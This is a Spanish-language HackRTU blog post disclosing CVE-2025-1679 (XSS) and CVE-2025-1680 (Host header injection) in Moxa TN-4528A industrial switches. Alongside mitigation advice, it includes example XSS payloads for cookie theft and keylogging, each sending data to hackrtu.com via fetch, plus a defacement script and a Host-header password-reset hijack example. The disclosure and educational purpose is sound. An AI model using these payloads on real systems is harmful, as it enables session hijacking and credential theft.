Blog HackRTU

‹ Regresar

CVE-2025-1679 y CVE-2025-1680: Dos nuevos CVE en dispositivos Moxa

 

CRÓNICAS DE LA GALAXIA

 

 

Habían pasado varias semanas desde la última aparición de Juakin PLC Walker y DAV-25. Pero su desaparición no era casualidad, habían estado trabajando en las sombras, de forma altruista, para detectar nuevas vulnerabilidades en dispositivos industriales que ayuden a los fabricantes a mejorar sus productos y que la galaxia sea más segura.

En una de sus últimas campañas de investigación en el planeta CES12S, Juakin había analizado unos switches de comunicaciones en una infraestructura crítica, el modelo era el TN-4528A del fabricante MOXA.

El TN-4528A es un switch ethernet industrial de la serie ToughNet, diseñado para entornos exigentes donde la fiabilidad y la robustez son cruciales. Además, está especialmente preparado para aplicaciones industriales que requieren alta disponibilidad y resistencia a condiciones adversas (más información sobre el dispositivo TN-4528A).

Concretamente, estos eran los datos del dispositivo afectado:

• Modelo: TN-4528A.
• Modelo específico: TN-4528A-16POE-4GPOE-T.
• Versiones de firmware revisadas (v3.13 y anteriores):
  • 3.6.94 build 23120715
  • 3.13.4 build 23081308

Gracias a la información reportada por Juakin PLC Walker al PSIRT de Moxa (Moxa Product Security Incident Response Team) y a la gran labor de sus trabajadores, dos vulnerabilidades han sido publicadas, siendo sus CVE ID:

• CVE-2025-1679: Cross-Site Scripting
  • CVSS v4.0: 4.8
  • CVSS AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
  • CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
  • EPSS (0,04%)
• CVE-2025-1680: Acceptance of Extraneous Untrusted Data With Trusted Data
  • CVSS v4.0: 0.0
  • CVSS AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N
  • CWE-349: Acceptance of Extraneous Untrusted Data With Trusted Data
  • EPSS (0,019%)

 

CVE-2025-1679 – CROSS-SITE SCRIPTING

Esta vulnerabilidad hace referencia a un XSS (Cross-Site Script) detectado en uno de los campos del servidor web del dispositivo TN-4528A.

Para los que no conozcan que es un XSS, este tipo de vulnerabilidad hace referencia a un problema de seguridad en el que se inyecta código malicioso (normalmente JavaScript) en páginas que otros usuarios van a visualizar. En resumen, el atacante puede lograr que un sitio web ejecute código arbitrario en el navegador de la víctima.

Un ejemplo básico de código que se puede inyectar en un campo del servidor web puede ser, por ejemplo:

<p>Nombre del dispositivo: <script>alert('SOMOS HACKRTU');</script></p>

Esto provocaría simplemente que cuando el usuario legítimo acceda a la visualización del servidor web, automáticamente, le saltase un pop-up en medio del navegador que le indicase: SOMOS HACKRTU.

Esta vulnerabilidad es muy común y una de las más explotadas en aplicaciones, servidores y dispositivos. Existen tres tipos de XSS:

• Reflected XSS: El atacante envía la petición y esta se muestra en el navegador de la víctima, pero sin ser persistente.
• Stored XSS: El payload del atacante queda almacenado en la aplicación y cada usuario que acceda ejecutará el código. Este tipo de XSS suele darse más en foros, comentarios, listado de eventos de seguridad de un dispositivo, etc.
• DOM-based XSS: El payload se procesa directamente en el navegador manipulando el DOM (Document Object Model) con JavaScript.

Existen una variedad de payloads para poder explotar una vulnerabilidad de tipo XSS, pero lo más importante, es el impacto que pueden tener este tipo de vulnerabilidad. Un XSS puede tener diferentes impactos entre los que se encuentran los siguientes:

ROBO DE COOKIES O TOKENS DE SESIÓN.

Permitiría a un supuesto atacante obtener las cookies almacenadas del usuario legítimo para posteriormente suplantar su identidad.

<script>fetch("https://www.hackrtu.com/steal?c=" + document.cookie);</script>

KEYLOGGING

El atacante inserta un script que le permite grabar las teclas de la víctima por ejemplo en un panel de acceso.

<script>document.addEventListener('keypress', function(e) {  fetch("https://www.hackrtu.com/keys?key=" + encodeURIComponent(e.key));});</script>

ROBO DE DATOS SENSIBLES

Obtención de información sensible de un usuario legítimo permitiendo a un atacante por ejemplo obtener contraseñas, direcciones, etc.

DEFACEMENT

Este tipo de explotación mediante un XSS permite a un atacante modificar visualmente el contenido de una página web para mostrar mensajes, imágenes o cualquier otra característica de forma alterada. Básicamente, se trata de una alteración de la interfaz del usuario manipulando el DOM del navegador de la víctima.

<script>document.body.innerHTML = "<h1 style='color:red;text-align:center;'>HackRTU was here!</h1>";</script>

Desde HackRTU, recomendamos ciertas acciones clave para reducir el riesgo de que los activos y productos se vean afectados por un XSS. Además, Moxa, ha determinado unas recomendaciones específicas para subsanar el CVE-2025-1679 en su página web.

Por nuestra parte, siempre recomendamos seguir las indicaciones de los fabricantes, pero si tu caso es que has llegado a este blog y no sabes bien como intentar eliminar o mitigar el riesgo de que tu producto o activo se vea afectado por un XSS, aquí tienes un pequeño listado de recomendaciones:

• Validación de los parámetros de entrada: Implementar listas blancas de que caracteres o parámetros de entrada están habilitados en los servidores web, aplicaciones, etc.
• Codificar la salida: Tratar toda la entrada de información como datos y no como código, aplicando librerías de codificación segura para escapar de caracteres especiales.
• Content Security Policy (CSP): Implementa una política CSP restrictive para bloquear los scripts en línea y que solo se pueda cargar código de JavaScript desde un sitio de confianza (Content-Security-Policy: default-src 'self'; script-src 'self')
• Marcar las cookies como sensibles mediante flags como HttpOnly o Secure.

Así mismo, OWASP, tiene un listado de medidas defensivas contra XSS.

 

CVE-2025-1680 – ACCEPTANCE OF EXTRANEOUS UNTRUSTED DATA WITH TRUSTED DATA

En cuanto a la vulnerabilidad CVE-2025-1680 que afecta al dispositivo TN-4528A, la clasificación corresponde a una aceptación de datos externos no fiables con vulnerabilidad de datos fiables, pero anteriormente se clasificaba como una inyección de encabezado de host. Tras un análisis exhaustivo por parte del equipo de MOXA, se determinó que la clasificación era “Acceptance Of Extraneous Untrusted Data With Trusted Data”, en coordinación con nuestros técnicos. A continuación, se ofrece una definición de este tipo de vulnerabilidad.

Tal y como se indica en el aviso de Moxa: “Se ha identificado una aceptación de datos externos no fiables con vulnerabilidad de datos fiables en los switches Ethernet de Moxa, lo que permite a los atacantes con privilegios administrativos manipular los encabezados HTTP Host inyectando un encabezado Host especialmente diseñado en las solicitudes HTTP enviadas al servicio web del dispositivo afectado”.

Con esto, desde HackRTU queremos ofrecer una explicación de lo que es una “Host Header Injection” y cómo prevenirla.

La vulnerabilidad CVE-2025-1680, catalogada como “Host Header Injection” por Moxa, fue el resultado de una investigación interna llevada a cabo por ellos mismos. Para analizar el impacto real de la vulnerabilidad, estudiaron el flujo del ataque y lo calificaron con una puntuación CVSS 4.0 de cero, ya que el impacto de la explotación es muy insignificante.

Resultado con el que nuestros investigadores están completamente de acuerdo y refuerza aún más el trabajo de los PSIRT dentro del mundo de la ciberseguridad industrial.

Una vulnerabilidad Host Header Injection sucede cuando no existe una validación por parte del aplicativo del encabezado Host en la petición realizada.

Cada vez que se visita una web, el navegador siempre envía una cabecera Host para indicar a que dominio se quiere acceder. Este tipo de vulnerabilidad lo que genera es una problemática de confianza ya que, al no controlarse la cabecera y confiar en el valor de la misma sin comprobarlo, un atacante puede modificar la cabecera para generar enlaces, redirecciones o un ataque específico para engañar a la víctima.

Pongamos un ejemplo sencillo en el que un usuario quiere recuperar su contraseña de acceso al dispositivo de Moxa TN-4528A y la aplicación genera el enlace de recuperación de la contraseña incluyendo la cabecera Host recibida (caso hipotético ya que este ejemplo no tiene, o no pretende tener, relación directa con la vulnerabilidad CVE-2025-1680).

PETICIÓN INICIAL

GET / HTTP/1.1

Host: hackrtu.com

ENLACE GENERADO

http://hackrtu.com/reset?token=12398021

Al ejecutarse esta acción por parte de un usuario, el enlace llegará al correo de la víctima y al hacer click, el token de reset, iría al dominio hackrtu.com (del atacante en vez de al legítimo)

En definitiva, un ataque de estas características permitiría a un atacante obtener tokens de reset de contraseñas como en el ejemplo, redirigir usuarios a webs falsas, afectar al cache del servidor web o al balanceador de carga, etc.

Existen algunas recomendaciones básicas que se pueden aplicar para reducir el riesgo o incluso eliminarlo como pueden ser:

• Evitar generar las URL desde el Host recibido usando un valor fijo de configuración para generar los enlaces.
• Incluir listas blancas de dominios válidos.
• Normalizar y filtrar cabeceras forwarded y solo confiar en X-Forwarded-Host / Forwarded si viene de proxies de confianza.
• Forzar que cualquier host que no sea tu host principal redireccione a tu dominio principal.
• Implementar cabeceras como HSTS (Strict-Transport-Security) para forzar siempre el uso de HTTPS y así evitar redirecciones inseguras.

Todas las recomendaciones proporcionadas por nuestro equipo de técnicos son recomendaciones genéricas. Para subsanar los problemas específicos de tanto la vulnerabilidad CVE-2025-1679 como de la vulnerabilidad CVE-2025-1680, HackRTU recomienda acceder al aviso generado por Moxa en relación a ambas vulnerabilidades. (MOXA advisory)

 

EQUIPO DE HACKRTU